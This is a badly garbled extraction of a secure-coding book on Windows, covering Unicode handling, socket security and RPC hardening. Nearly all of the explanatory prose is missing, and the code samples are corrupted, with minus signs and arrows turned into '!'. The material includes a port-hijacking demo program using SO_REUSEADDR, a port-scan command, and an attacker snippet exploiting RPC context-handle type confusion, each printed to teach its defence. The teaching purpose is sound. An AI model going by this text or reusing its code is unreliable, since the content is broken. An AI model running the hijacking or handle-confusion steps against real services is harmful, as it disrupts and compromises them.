StringCchLength(wszString, MAX_STRING_LEN,&Length);
if (Length+1 != rc) {
printf(" %d != rc %d\n", Length, rc);
throw FALSE;
}
// Unicode!
// .
for (size_t ctr = 0; ctr < Length; ctr++) {
if (pwcTemp[ctr] != wszString[ctr])
throw FALSE;
}
} catch (BOOL iErr) {
fStatus = iErr;
}
if (pbTemp) delete [] pbTemp;
if (pwcTemp) delete [] pwcTemp;
return (fStatus);
}
int _cdecl main(
int argc,
char* argv[])
{
LPWSTR s1 = L"\x00a9MicrosoftCorp";
LPWSTR s2 = L"To\x221e&Beyond";
printf("1252
printf("437
printf("1252
printf("437

// Copyright
// Infinity

" " = %d\n", CheckRoundTrip(1252, s1));


" " = %d\n", CheckRoundTrip(437, s1));
"" = %d\n", CheckRoundTrip(1252, s2));
"" = %d\n", CheckRoundTrip(437, s2));

14

385

return (1);
}
,
. ,
1252 ( Windows Latin I,
) 437 ( MS
DOS): 1252, 437, 
437, 1252.


, , 
 , 
. , . 
, [
(. http://www.unicode.org/
unicode/reports/tr21)], Invariant, (LOCALE_INVARIANT) Win
dows XP invariant culture .

int nResult = CompareString(


LOCALE_INVARIANT,
NORM_IGNORECASE | NORM_IGNOREKANATYPE | NORM_IGNOREWIDTH,
lpStr1, !1, lpStr2, !1 );
, Windows XP,
US English. Windows XP
CompareString , LOCALE_INVARIANT, Microsoft 
, .

int nResult = CompareString(


MAKELCID(MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT), SORT_DEFAULT),
NORM_IGNORECASE | NORM_IGNOREKANATYPE | NORM_IGNOREWIDTH,
lpStr1, !1, lpStr2, !1 );
, 
. ,
, 
. , Windows:
A Z 
;
I i;
A a;
.
Windows 
( ). 
, ,
. , 
(Invariant) .

386

II

Unicode
Unicode , 
( )
. , ,
U+0030 (0) U+0039 (9).
Unicode 3.1 . 
.
Unicode.
.NET Framework GetUnico
deCategory. , NLS 
. Unicode
http://www.unicode.org/unicode/reports/tr23.
GetStringTypeEx,
. , GetStringTypeEx,
Unicode, .
Windows ,
GetStringTypeEx.
. 141 GetStringTypeEx Unicode
, U+0080. U+0080
Unicode.

14-1.

Unicode

GetStringTypeEx

Unicode

C1_ALPHA

C1_UPPER

C1_LOWER

C1_DIGIT

C1_SPACE

C1_PUNCT

C1_CNTRL

ISO, , ,

C1_XDIGIT

C3_NONSPACING

C3_SYMBOL

C3_KATAKANA

C3_HIRAGANA

C3_HALFWIDTH

C3_IDEOGRAPH

, Unicode,
. , 

. . .

14

387

A. ,
. 
, , . 
, .
.
Unicode Consortium 
. Form C.
. 
. , ,
Form C. ( http://
www.unicode.org/unicode/reports/tr15/.)
URL IETF (Internet
Engineering Task Force) W3C. http:/
/www.idn.net/draft/draftduersti18nnorm04.txt http://www.w3.org/TR/
charmod.
NTFS, FAT32, NFS, High Sierra MacOS
.
.

RFC.
Win32 FoldString 
. , Unicode,

Unicode. FoldString,
Unicode. , FoldString MAP_FOLDDIGITS
, Unicode.

I18N ,  ,
. 
,
. ,
,
.
, , I18N .
I18N 
, ,
12
Unicode. , 
, .
I18N,
Microsoft (http://www.microsoft.com/globaldev) Unicode (http://
www.unicode.org). (http://
www.unicode.org/unicode/consortium/distlist.html). , ,
news://comp.std.internat.

I I I

15

(sockets) ,
TCP/IP. IP
TCP UDP , 
. , 
IPv6 (Internet Protocol version 6) 
.
, ;
, 
; .
, 
,
.
, .
, (Bob Quinn) 
(David Shute) Windows Sockets Network Programming (AddisonWesley
Publishing Co., 1995). C 
++. .cpp, 
,
C. 
Microsoft,
.
, Windows 
, ( 
SSL/TLS) API SSPI (Secu
rity Support Provider Interface). API
, : 
. 4, SSPI

15

391

(Jeffrey Richter) (Jason Clark) Prog


ramming ServerSide Applications for Microsoft Windows 2000 (Microsoft Press, 2000)
( ., . . Microsoft
Windows 2000. .:; .: , 2001).


(server hijacking) 
, . 
? 
. 
TCP UDP . , 
, , .
(unsigned short) ( 16) 
C C++. 065535.
bind :

int bind (
SOCKET s,
const struct sockaddr FAR* name,
int namelen
);
.
IPv4* (Internet Protocol version 4)
sockaddr_in:

struct sockaddr_in{
short
sin_family;
unsigned short
sin_port;
struct
in_addr sin_addr;
char
sin_zero[8];
};

IPv6 .
, Microsoft
Service Pack 1 Microsoft Windows XP.
IPv6 IPv4. IPv4, ,
, 
.
IP 
sin_port sin_addr.
, sin_addr
. bind , , 

,
IP. . .

392

III

INADDR_ANY ( 0), 
. IP, 
, .
( ) : .

. INADDR_ANY 
IP. IP:
157.34.32.56 172.101.92.44.
172.101.92.44,
INADDR_ANY. 
IP, .
, ,
. , ,
.
SO_EXCLUSIVEADDRUSE, Microsoft Windows NT 4 SP 4.
, Microsoft ,
(Chris Wysopal) ( Weld Pond).
Netcat ( Hobbit) Windows
: 
Windows NT .
, Hobbit
L0pht ( @stake). (.
Secureco2\Chapter15\BindDemo) 
.

/*
BindDemoSvr.cpp
*/
#include <winsock2.h>
#include <stdio.h>
#include <assert.h>
#include "SocketHelper.h"
// , winsock2.h
#ifndef SO_EXCLUSIVEADDRUSE
#define SO_EXCLUSIVEADDRUSE ((int)(~SO_REUSEADDR))
#endif
/*
UDP!.
8391. ,
.
*/
int main(int argc, char* argv[])
{
SOCKET sock;
sockaddr_in sin;
DWORD packets;

15

bool hijack = false;


bool nohijack = false;
if(argc < 2 || argc > 3)
{
printf(" %s [ ]\n", argv[0]);
printf(":\n\t!hijack\n\t!nohijack\n");
return !1;
}
if(argc == 3)
{
// , "!hijack"
// "!nohijack".
if(strcmp("!hijack", argv[2]) == 0)
{
hijack = true;
}
else
if(strcmp("!nohijack", argv[2]) == 0)
{
nohijack = true;
}
else
{
printf(" %s\n", argv[2]);
return !1;
}
}
if(!InitWinsock())
return !1;
// .
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sock == INVALID_SOCKET)
{
printf(" ! err = %d\n", GetLastError());
return !1;
}
// .
// sockaddr_in.
// ,
// .
if(!InitSockAddr(&sin, argv[1], 8391))
{
printf(" sockaddr_in ! doh!\n");
closesocket(sock);

393

394

III

return !1;
}

// : .
if(hijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_REUSEADDR,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_REUSEADDR ! !!\n");
}
else
{
printf(" SO_REUSEADDR ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
else
if(nohijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_EXCLUSIVEADDRUSE,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_EXCLUSIVEADDRUSE \n");
printf(" !\n");
}
else
{
printf(" SO_ EXCLUSIVEADDRUSE ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
if(bind(sock, (sockaddr*)&sin, sizeof(sockaddr_in)) == 0)
{
printf(" %s\n", argv[1]);
}

15

else
{
if(hijack)
{
printf("! !\ n");
}
printf(" !
= %d\n", GetLastError());
closesocket(sock);
return !1;
}
// , . ,
// ! ! ,
// .
for(packets = 0; packets < 10; packets++)
{
char buf[512];
sockaddr_in from;
int fromlen = sizeof(sockaddr_in);
// : ;
// 0, ;
// 0,
//( );
// 0, .
if(recvfrom(sock, buf, 512, 0, (sockaddr*)&from, &fromlen)> 0)
{
printf(" %s %d:\n%s\n",
inet_ntoa(from.sin_addr),
ntohs(from.sin_port),
buf);
// ,
// .
if(hijack)
{
sockaddr_in local;
if(InitSockAddr(&local, "127.0.0.1", 83 91))
{
buf[sizeof(buf)!1] = '\0';
strncpy(buf, " !", siz eof(buf) !1);
if(sendto(sock,
buf,
strlen(buf) + 1, 0,
(sockaddr*)&local,
sizeof(sockaddr_in)) < 1)
{

395

396

III

printf
(" localhost ! err = %d\n",
GetLastError());
}
}
}
}
else
{
// , , ,
// .
printf(" %d\n", GetLastError() );
break;
}
}
return 0;
}
, 
. SocketHelper.cpp ,
. , 
.
. 
: hijack nohijack. 
, .
. hijack SO_REUSEADDR,
, nohijack
SO_EXCLUSIVEADDRUSE, SO_REUSEADDR. 
, . 

.
, 
.
, , SO_EX
CLUSIVEADDRUSE. , ,
:

BindDemo.exe 0.0.0.0
( 192.168.0.1 IP
):

BindDemo.exe 192.168.0.1 hijack


, :

BindDemoClient.exe 192.168.0.1
:

15

397

SO_REUSEADDR ! !!
192.168.0.1
192.168.0.1 4081:
!
:

0.0.0.0
192.168.0.1 8391:
!
(,
, , IP , 
ACL), ,
.
, 
. , , ,
.
. (
) :

BindDemo.exe 0.0.0.0 nohijack


, :

BindDemo.exe 192.168.0.1 hijack


:

SO_EXCLUSIVEADDRUSE ! !
0.0.0.0
:

SO_REUSEADDR ! !!
! !
= 10013
, ,
:

192.168.0.1 4097:
!
SO_EXCLUSIVEADDRUSE
,
. , 
TCP/IP
. , 
shutdown , recv
, 
. closesocket, 
. shutdown SDK.

398

III

Windows .NET Server 2003 


SO_EXCLUSIVEADDRUSE
DACL, 
. 
.


TCP
RFC, TCP,
, . 
,
, TCP ACK 
. , 
, .
(Douglas Comer) Internet
working with TCP/IP Vol. 1: Principles, Protocols, and Architectures (4th Edition) (Pren
tice Hall, 2000) ( . /I. . 1. , . .:
, 2003).
:  
( ),

. 
40 TCP IP. 
,

.
TCP/IP
,
. , 
, , .

. , 
. , 
, .
,
. ,
Webc,
. ,
close shutdown.


, 
, , 
. IP ,
: ,

15

399

. ,
, , (multihomed)
. . 

. , IP 
, 
/. 
, IP ,
; 
. ,
,
. , 
. ,
IP :
;
IP(),
;
, .
IP 
Windows NT. ,
, , 
.



API Windows Sockets 2.0 (Winsock)
, . 
, (, UDP), : 
IP ,
. ,
. 
, , , 
.
(, TCP)
. , TCP
. 
, SYN. 
(, ),
SYNACK,
ACK. . 
, FIN. 
FINACK . 
, FIN
FINACK ,
(maximum segment lifetime, MSL).

400

III

MSL , 
, .
, 
accept ( Accept
Connection.cpp, Secureco2\Chapter15\AcceptConnection):

void OldStyleListen(SOCKET sock)


{
// . .
// .
int conns = 0;
while(1)
{
// .
if(listen(sock, SOMAXCONN) == 0)
{
SOCKET sock2;
sockaddr_in from;
int size;
// ! accept,
// .
conns++;
size = sizeof(sockaddr_in);
sock2 = accept(sock, (sockaddr*)&from, &size);
if(sock2 == INVALID_SOCKET)
{
printf(" ! %d\n",
GetLastError());
}
else
{
// :
// .
printf(" %s\n",
inet_ntoa(from.sin_addr));
// , ;
// :
// .
if(conns % 2 == 0)
{
printf(" .\n");
// ! .
}
else

15

401

{
printf(" !\n");
}
closesocket(sock2);
}
}
else
{
//
printf(" !
= %d\n", GetLastError());
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
,
. ? ,
, ,
. , , 
. ,
. ,
 , IP
, FINACK FIN . 
MLS. 
, 
,
. setsockport
SO_LINGER 
closesocket. .
WSAAccept.
SO_CONDITIONAL_ACCEPT
, 
.

int CALLBACK AcceptCondition(


IN LPWSABUF lpCallerId,
IN LPWSABUF lpCallerData,
IN OUT LPQOS lpSQOS,
IN OUT LPQOS lpGQOS,
IN LPWSABUF lpCalleeId,
OUT LPWSABUF lpCalleeData,
OUT GROUP FAR *g,

402

III

IN DWORD dwCallbackData
)
{
sockaddr_in* pCaller;
sockaddr_in* pCallee;
pCaller = (sockaddr_in*)lpCallerId!>buf;
pCallee = (sockaddr_in*)lpCalleeId!>buf;
printf(" %s\n",
inet_ntoa(pCaller!>sin_addr));
// , Windows 98,
// Q193919.
if(lpSQOS != NULL)
{
// QOS.
}
// , !
// .
if(pCaller!>sin_addr.S_un.S_addr == inet_addr(MyIpAddr))
{
return CF_REJECT;
}
else
{
return CF_ACCEPT;
}
//
//
//
//
//

: CF_DEFER !
,
.
DNS! ,
, , .

}
void NewStyleListen(SOCKET sock)
{
// . .
// .
int conns = 0;
// .
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_CONDITIONAL_ACCEPT,
(const char*)&val, sizeof(val)) != 0)

15

{
printf(" SO_CONDITIONAL_ACCEPT !
= %d\n",
GetLastError());
return;
}
while(1)
{
// .
if(listen(sock, SOMAXCONN) == 0)
{
SOCKET sock2;
sockaddr_in from;
int size;
// ! accept,
// .
conns++;
size = sizeof(sockaddr_in);
// .
sock2 = WSAAccept(sock,
(sockaddr*)&from,
&size,
AcceptCondition,
conns); // conns .
if(sock2 == INVALID_SOCKET)
{
printf(" ! %d\n",
GetLastError());
}
else
{
// :
// .
printf(" %s\n",
inet_ntoa(from.sin_addr));
// ! .
closesocket(sock2);
}
}
else
{
//
printf(" !
= %d\n", GetLastError());

403

404

III

break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
, ; ,
,
. 
 :

[d:\]PortScan.exe !v !p 8765 192.168.0.1


Port 192.168.0.1:8765:0 timed out
:

[d:\]AcceptConnection.exe


!

!

192.168.0.1
10061
192.168.0.1
10061
192.168.0.1
10061

TCP
, , .
SYN . ,
SYN, . 
, , 
. 
, .
: 

. 
.
,
.
WSAAccept ,
SYN (SYN
flood).
( AcceptEx) 
/.

15

405

,

,
. : 
! . , 
(
). 
, . 
, , 
.

, . 
, 
. , .
, . 
, ,
.
, ,
:
;
;
, ;
;
, IP ;
.
.



. 
, , 
. , 
,
TCP.
, :

. , 
, .
, IP , . 

.

406

III



FTP. 21 TCP, 
TCP
20 ( 1024).
, , 
20 
, .
, , Microsoft SQL Server, 
1433, Microsoft Terminal Server ( 3389), X Window (
XWindow 
) ( 6000).
, 
, 
. 
. , 
. , , 
,
. , ,
.


(, TCP) , , 
( , UDP). 
, 
, . 
, DNS,
:

Allow internal UDP high port to external UDP port 53


Allow external UDP port 53 to internal UDP high port

53 UDP , 
.
. ,
, 
. , 
. , ,

. ,

( ), ,
.

15

407



, 
. 
, ( 
, ), 
.  ,

, 
 . 
,
(content level
filters). , 
. 
,
. , .
, Web
80 .

IP-

IPv6 , 
(network address translation, NAT) 
, ,  
.
IP, ,
, NAT . :
IP . ,

IPv6.


,
, . 
.
, 
. , , 
(
); , ,
, .

408

III



: ,
. ,
, .
; 
,
.
, , syslog.
UNIX UNIX
Windows. UDP,
, syslog
.
, 
.

. , (Kevin
Mitnick) rsh IP 
(Tsutomu Shimomura). ,
TCP
, , 
, .
DNS. , DNS 
, , , somehost.nicwguys.org,
, destruc
tion.evilhackers.org.
! , , 
,
. 
IP DNS
.
. 
rsh: , UNIX 
( root) 1024.
: 
, , , 
, . ,
 . , 
,  ,
, .
,
.
, 
. ,

15

409

, ( ) ,
. ! , 
,
.

IPv6 !
IPv6 IP, 
IP IPv4. IPv6 128
, IP
,
. IPv6 ,
, . IPv6
. 
, ,
IP .
IPv6 , ,
IPv4, (Christian
Huitema) IPv6: The New Internet Protocol, Second Edition (IPv6:
) (Prentice Hall PTR, 1998).
Internet Activities Board IETF, Microsoft.
IPv6 Microsoft Windows .NET Server 2003
Service Pack 1 Windows XP.
IPv6.
IPv6 IPa. IPv6
IP, , . 
, IPv6 IP.
IPv6 : 
(link local), (site local) (global).
, , 
IP. IP, , 
,
. :
; .
IPv6 IPSec (Internet Protocol
Security). IPv6 . 
IPv6, , 
(, ),

,
IPSec. ,
IPv6
, . , ,
 Microsoft
.
IPv6 . , 
( IPv4) ,

410

III

. 64
IPv6 
.

, ,
. , Windows .NET
Server 2003 .
,

.
, 
. : 
, .
, ,
.

16
RPC,
ActiveX-
DCOM

(Remote Procedure Call, RPC) 


Microsoft Windows NT 3.1
( 1993 .). RPC: DCE (Distributed
Computing Environment) RPC ONC (Open Network Computing) RPC. 
. 
Microsoft DCE RPC,
Windows ONC RPC. , DCE RPC
Microsoft RPC, ONC RPC Sun RPC. RPC
DCE RPC, Microsoft, 
RPC.
Windows NT/2000/XP 
RPC. 
, 
RPC.
. , DCOM ActiveX. 
, RPC DCOM (Distributed COM) 
COM, ActiveX 
COM.

, RPC, ,
Microsoft. ,
LSA ,

412

III

. , API; 
API LsaLookupSids,
LSA RPC. 
Malformed Security Identifier Request ( 
) http://www.microsoft.com/technet/security/bulletin/
ms99057.asp.
135 
Windows NT 3.51/NT 4 RP, 
, 100 ,
. 
telnet 135,  
. Telnet to Port 135
Causes 100 Percent CPU Usage ( Telnet 135 100
) Microsoft Knowledge Base (http://support
.microsoft.com/support/kb/articles/Q162/5/67.asp).
, Microsoft 2001 . 
Malformed RPC Request Can Cause Service Failure ( RPC
), RPC (stubs),

, DoS. 
http://www.microsoft.com/technet/security/bulletin/ms01041.asp.

RPC
RPC.
RPC,
RPC. 
RPC .

RPC
RPC (Remote Procedure Call) 
, . 
, 
RPC (RPC runtime) ,
.
RPC C
C++. ,
(, Perl, Microsoft JScript Microsoft Visual Basic) RPC
COM DCOM.
Microsoft Windows RPC
OSF RPC (Open Software Foundation RPC),
, UNIX Apple.
Windows [ Print Spooler (
), Event Log ( ), Remote Registry ( 

16

RPC, ActiveX- DCOM

413

), Secondary Logon ( )], 


,
RPC. , , ,
RPC LRPC.

RPC-
RPC . 
RPC 
, RPC . RPC
:
;
;
( .idl);
( .acf).
C/C++. 
: RPC, , RPC.
RPC, ,
, RPC. IDL.
( , 
),
. ACF
RPC, .


RPC .
1. IDL ACF Midl.exe.
: RPC .
2. RPC. :
, .
3. RPC 
( Rpcrt4.lib).
4. RPC. ,

.
5. RPC
( Rpcrt4.lib).
! , (. 161). 
( ) Phone,
Phonec.c, Phones.c, IDL ACF 
Phone.idl Phone.acf. Phone.idl
Midl.exe : Phone.h 
RPC Phone_c.c Phone_s.c. Phonec.c Phone_c.c
Ppcrt4.lib, 
Phonec.exe. , Phones.c

414

III

Phone_s.c Ppcrt4.lib
Phones.exe.
Phone.idl

Phone.acf



Phone_c.c

Phone_s.c
Midl.exe

Link.exe

Phonec.exe

161.

Link.exe

Phonec.c

Phone.h

Phones.c

Phones.exe

RPC

, !
Phne Secureco2\Chapter16\RPC.

RPC-
RPC,
, , (marsalling)
. 
, RPC 
. ,
. 
,
.
RPC 
,
TCP/IP. : , ,
RPC.
(bind) , 
.
, 
, (protocol sequences), .
. . 161
.

16

16-1.

RPC, ActiveX- DCOM

415

ncacn_np

ncalrpc

( )

ncacn_ip_tcp

TCP/IP

, ,
. , 
. 
RpcStringBindingCompose. ,
ncacn_np:northwintraders[\\pipe\\phone]:

LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE

pszUuid
= (LPBYTE)NULL;
pszProtocolSequence
= (LPBYTE)"ncacn_np";
pszNetworkAddress
= (LPBYTE)"northwindtraders";
pszEndpoint
= (LPBYTE)"\\pipe\\phone";
pszOptions
= (LPBYTE)NULL;
pszStringBinding
= (LPBYTE)NULL;

RPC_STATUS status = RpcStringBindingCompose(pszUuid,


pszProtocolSequence,
pszNetworkAddress,
pszEndpoint,
pszOptions,
&pszStringBinding);
RPC.


RPC 
: RPC
. ,
;
.

, . 
,
cookie Web.
: RPC :
.
. . 

.

416

III


RPC

. RPC :
DoS, 
RPC, RPC 
;
 
: 
;
: 
.
r ?

/robust MIDL-
Windows 2000 MIDL (Microsoft
Interface Definition Language) /robust.
, RPC
. ,
, RPC. ,
.
Windows 2000
, .
.
Windows 2000.
RPC Windows NT 4, 
: Windows NT 4 Windows 2000 . 
: /robust
MIDL.
/robust ,
.

[range]
IDL
, . , IDL
(blob) :

void Message([in] long lo,


[in] long hi,
[size_is(lo, hi)] char **ppData);
lo hi ,
,
.

16

RPC, ActiveX- DCOM

417

[range]. lo hi 
0 1023, , ,
ppData, 1023 .

void Message([in, range(0,1023)] long lo,


[in, range(0,1023)] long hi,
[size_is(lo, hi)] char **ppData);
: , ,
IDL /robust. ,
, hi lo, 
.


DoS 
. ,
.
, 
.
, , ,
. DoS ? :
, ,
. , 
, ,
! RPC 
.
, 
. 
, , 
, . , 
, , 
.
.
RPC
( )
: ( 
) . 
. , 
.


,

RpcBindingSetAuthInfo. 
.

status = RpcBindingSetAuthInfo(
phone_Handle,

418

III

szSPN,
// Kerberos SPN .
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
0);
, szSPN, (service principal name,
SPN), . , AuthnLevel, 
RPC_C_AUTHN_LEVEL_PKT_PRIVACY , , 
,
. . 162 
RPC.

16-2.

RPC

RPC_C_AUTHN_LEVEL_
DEFAULT


. 
, ,
. , 
,

!

RPC
RPC_C_AUTHN_LEVEL_CONNECT

RPC_C_AUTHN_LEVEL_NONE

. 

RPC_C_AUTHN_LEVEL_
CONNECT

RPC_C_AUTHN_LEVEL_CALL


RPC. : 
( 
ncacn), 
RPC_C_AUTHN_LEVEL_PKT

RPC_C_AUTHN_LEVEL_PKT

RPC_C_AUTHN_LEVEL_PKT_

RPC_C_AUTHN_LEVEL_PKT_
PRIVACY


RPC_C_AUTHN_LEVEL_PKT, 

INTEGRITY
6

RPC_C_AUTHN_LEVEL_PKT_INTEG
RITY,

, Authn
Level ,
, .
: RpcBinding
SetAuthInfo
, 
.

16

RPC, ActiveX- DCOM

419



,
.
RpcServerRegisterAuthInfo:

status = RpcServerRegisterAuthInfo(
szSPN,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL);
Windows , AuthnSvc,
. 
RPC_C_AUTHN_GSS_WINNT, NTLM
. , Windows 2000 
RPC_C_AUTHN_GSS_NEGOTIATE:
: NTLM Kerberos.
RPC_C_AUTHN_GSS_KERBEROS, RPC_C_
AUTHN_GSS_NEGOTIATE , 
, Windows NT 4. , 
:
NTLM.

, RpcBindingInqAuthClient.
(NTLM Kerberos)
( , ,
..). .

// RPC! .
void Message(handle_t hPhone, unsigned char *szMsg) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
hPhone,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\n", status);
RpcRaiseException(ERROR_ACCESS_DENIED);
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {

420

III

printf(" .\n");
RpcRaiseException(ERROR_ACCESS_DENIED);
}
if (RpcImpersonateClient(hIfPhone) != RPC_S_OK) {
printf(" .\n");
RpcRaiseException(ERROR_ACCESS_DENIED);
}
char szName[128+1];
DWORD dwNameLen = 128;
if (!GetUserName(szName, &dwNameLen))
lstrcpy(szName, " ");
printf(": %s\n"
"%s %d\n",
szMsg, szName, dwAuthn);
RpcRevertToSelf();
}
. Message
. 
RpcBindingInqAuthClient AuthnLevel.
AuthnLevel 
, , 
, .

. , 
.
, , 
. Windows .NET Server 2003 
( 
). 
Windows .NET Server 2003 Impersonate a client after
authentication ( )
, , 
.

Kerberos
szSPN, RpcBindingSetAuthInfo, 
, Kerberos.
: Kerberos
, NTLM . 
. Kerberos, szSPN
NULL.

DsMakeSPN. Ntdsapi.h

16

RPC, ActiveX- DCOM

421

Ntdsapi.dll. DsMa
keSPN.

DWORD cbSPN = MAX_PATH;


char szSPN[MAX_PATH + 1];
status = DsMakeSpn("ldap",
"blake!laptop.northwindtraders.com",
NULL,
0,
NULL,
&cbSPN,
szSPN);
,
:

LPBYTE szSPN = NULL;


status = RpcServerInqDefaultPrincName(
RPC_C_AUTHN_GSS_NEGOTIATE,
&szSPN);
if (status != RPC_S_OK)
ErrorHandler(status);
// .
status = RpcServerRegisterAuthInfo(
szSPN,
RPC_C_AUTHN_GSS_NEGOTIATE,
0, 0);
if (status != RPC_S_OK)
ErrorHandler(status);
...
if (szSPN)
RpcStringFree(&szSPN);



. RPC
? Microsoft Platform SDK 
RPC RPCSvc,
RPC.
.
Windows XP Professional, Windows .NET Server 2003
500 256 . 
 ,
100 . . 163 
, :
TCP/IP.

422

III

16-3.

RPC

AuthnLevel


(ncacn_np),

TCP/IP
(ncacn__ip_tcp),

RPC_C_AUTHN_LEVEL_NONE

1926

1051

RPC_C_AUTHN_LEVEL_CONNECT

2023

1146

RPC_C_AUTHN_LEVEL_PKT_PRIVACY

2044

1160

, 
. 10%,
. :
RPC_C_AUTHN_LEVEL_CONNECT RPC_C_AUTHN_LEVEL_
PKT_PRIVACY . RPC_C_AUTHN_
LEVEL_CONNECT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
.


RPC,
.
! 2000 . 
Microsoft
, 
RPC. 
, ( 
RpcBindingSetAuthInfo)
. ( ) 
, 
. , 
: , 
, . ,

, 
RPC DCOM.
. 162 RPC_C_AUTHN_LEVEL_NO
NE, . 163 RPC_C_AUTHN_LEVEL_PKT_PRIVACY.



, (strict
handle). DoS.
. 
, . [strict_con
text_handle] ACF ,
, .

16

RPC, ActiveX- DCOM

. 162. RPC RPC_C_AUTH_LEVEL_NONE.


. 163. RPC
RPC_C_AUTH_LEVEL_PKT_PRIVACY. ,
,

423

424

III

,
. IDL,
RPC :
.

interface PrinterOperations {
typedef context_handle void *PRINTER_CONTEXT;
void OpenPrinter([in, out] PRINTER_CONTEXT *ctx);
void UsePrinter([in] PRINTER_CONTEXT ctx);
void ClosePrinter([in, out] PRINTER_CONTEXT *ctx);
}
interface FileOperations {
typedef context_handle void *FILE_CONTEXT;
void OpenFile([in, out] FILE_CONTEXT *ctx);
void UseFile([in] FILE_CONTEXT ctx);
void CloseFile([in, out] FILE_CONTEXT *ctx)
}
++ RPC:

void OpenPrinter(PRINTER_CONTEXT *ctx) {


// !.
*ctx = new CPrinterManipulator();
if (*ctx == NULL)
RpcRaiseException(ERROR_NOT_ENOUGH_MEMORY);
// .
...
}
void UseFile(FILE_CONTEXT ctx) {
// .
CFileManipulator cFile = (CFileManipulator*)ctx;
// .
...
}
RPC, 
. 
, RPC 
, CFileManipulator cFile = (CFileManipulator)ctx
. ,
.

void *ctxAttacker;
OpenPrinter(&ctxAttacker);
UseFile(ctxAttacker);
UseFile(ctxAttacker)
FILE_CONTEXT, PRINTER_CONTEXT.

16

RPC, ActiveX- DCOM

425

ACF,
[strict_context_handle]:

[explicit_handle, strict_context_handle]
interface PrinterOperations{}
interface FileOperations{}
RPC ,
PrinterOperations FileOperations 
.




.
,
RPC.
, . 
, 
.

, , 
.
, 
, .
,
,
.
RPC , 
( ,
), ,
. , RPC
.
, ( RPC 

) 
, , 
, ,
. 
,
, ,
,
.

426

III


(NULL) 
(
), ,
DoS.
NULL, :

void MyFunc(..., /* [ ] */ CONTEXT_HANDLE_TYPE *hCtx) {}


hCt NULL, hCtx. 
hCtx . RPC
,
,
.
.

short OpenFileByID(handle_t hBinding,


PPCONTEXT_HANDLE_TYPE pphCtx,
short sDeviceID) {
short sErr = 0;
HANDLE hFile = NULL;
*pphCtx = NULL;
if (RpcImpersonateClient(hBinding) == RPC_S_OK) {
hFile = OpenIDFile(sDeviceID);
if (hFile == INVALID_HANDLE_VALUE) {
sErr = !1;
} else {
// .
FILE_ID *pFid = midl_user_allocate(sizeof ( FILE_ID));
if (pFid) {
pFid!>hFile = hFile;
*pphCtx = (PCONTEXT_HANDLE_TYPE)pFid;
} else {
sErr = ERROR_NOT_ENOUGH_MEMORY;
}
}
RpcRevertToSelf();
}
return sErr;
}
short ReadFileByID(handle_t hBinding, PCONTEXT_HANDLE_TYPE phCtx) {
FILE_ID *pFid;
short sErr = 0;
if (RpcImpersonateClient(hBinding) == RPC_S_OK) {
pFid = (FILE_ID *)phCtx;
ReadFileFromID(phCtx!>hFile,...);
RpcRevertToSelf();
} else {

16

RPC, ActiveX- DCOM

427

sErr = !1;
}
return sErr;
}
short CloseFileByID(handle_t hBinding, PPCONTEXT_HANDLE_TYPE pphCtx) {
FILE_ID *pFid = (FILE_ID *)*pphCtx;
pFid!>hFile = NULL;
midl_user_free(pFid);
*pphCtx = NULL;
return 0;
}

OpenFileByID. , 
,
. , RpcImpersonateClient Open
IDFile , pphCtx NULL. 
CloseFileByID ReadFileByID, 
.
RPC ,
NULL, .

if (*pphCtx == NULL) {
// .
}


RPC, 
. RPC
, 
, .
RPC ,

Identify ().
RpcBindingSetAuthInfoEx:

// .
RPC_SECURITY_QOS qosSec;
qosSec.Version = RPC_C_SECURITY_QOS_VERSION;
qosSec.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
qosSec.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
qosSec.ImpersonationType = RPC_C_IMP_LEVEL_IDENTIFY;
status = RpcBindingSetAuthInfoEx(..., &qosSec);
ImpersonationType :
RPC_C_IMP_LEVEL_ANONYMOUS ( , 
), RPC_C_IMP_ LEVEL_IDENTIFY ( 
), RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELE

428

III

GATE ( , , 
).


RPC
. RPC RpcServer
RegisterIf RpcServerRegisterIf2 RpcServerRegisterIfEx,
, ,
RPC ,
.

RPC_C_AUTHN_LEVEL_PKT .

/*
Phones.cpp
*/
...
//
// RPC!.
RPC_STATUS RPC_ENTRY SecurityCallBack(RPC_IF_HANDLE idIF, void *ctx) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
ctx,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\ n", status);
return ERROR_ACCESS_DENIED;
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
printf(" .\n");
return ERROR_ACCESS_DENIED;
}
return RPC_S_OK;
}
...
void main() {
...

16

RPC, ActiveX- DCOM

429

status = RpcServerRegisterIfEx(phone_v1_0_s_ifspec,
NULL,
NULL,
0,
RPC_C_LISTEN_MAX_CALLS_DEFAULT,
SecurityCallBack);
...
}
MSDN Platform SDK

: <_>(RPC_IF_ID interface, void context) 
<_>(RPC_IF_HANDLE interface, void context).
, RpcServer
